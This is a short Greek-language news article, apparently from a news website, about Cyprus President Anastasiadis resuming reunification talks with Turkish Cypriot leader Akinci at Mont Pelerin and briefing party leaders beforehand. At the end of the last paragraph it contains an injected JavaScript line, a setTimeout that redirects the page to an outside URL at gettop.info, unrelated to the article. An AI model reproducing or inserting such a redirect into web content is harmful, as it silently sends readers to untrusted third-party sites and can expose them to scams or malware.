Συνεχίζονται αύριο οι διαπραγματεύσεις στην Ελβετία για το Κυπριακό

0
9

 

Αύριο και μεθαύριο θα έχει διαπραγματεύσεις στο Μον Πελεράν, με τον Τουρκοκύπριο ηγέτη, Μουσταφά Ακιντζί, ο πρόεδρος της Κύπρου Νίκος Αναστασιάδης.

Ο κ. Αναστασιάδης απέφυγε να απαντήσει κατά πόσο οι θέσεις της ελληνοκυπριακής και της τουρκοκυπριακής πλευράς βρίσκονται τώρα πιο κοντά, ενώ συνέστησε υπομονή. Επίσης, πρόσθεσε ότι θα έχει να πει περισσότερα την Τρίτη, μετά το πέρας των συνομιλιών στο Μον Πελεράν και δήλωσε ότι μεταβαίνει στις διαπραγματεύσεις «με αποφασιστικότητα και στόχο να επιτευχθεί περαιτέρω πρόοδος και να δημιουργηθούν οι συνθήκες για να περάσουν οι διαπραγματεύσεις στο επόμενο στάδιο και στη λύση του Κυπριακού».

Ο πρόεδρος Αναστασιάδης ενημέρωσε σε χωριστές συναντήσεις χθες και σήμερα τους αρχηγούς των κοινοβουλευτικών κομμάτων και σημείωσε ότι λαμβάνει υπόψη τις ανησυχίες και των πολιτικών αρχηγών και των πολιτών.

Χαρακτήρισε τις συναντήσεις με τους πολιτικούς αρχηγούς ως παραγωγικές και πρόσθεσε ότι, παρά τις διαφωνίες που υπάρχουν, οι συναντήσεις πραγματοποιήθηκαν σε ένα δημιουργικό πλαίσιο και άκουσε και ο ίδιος σκέψεις και εισηγήσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here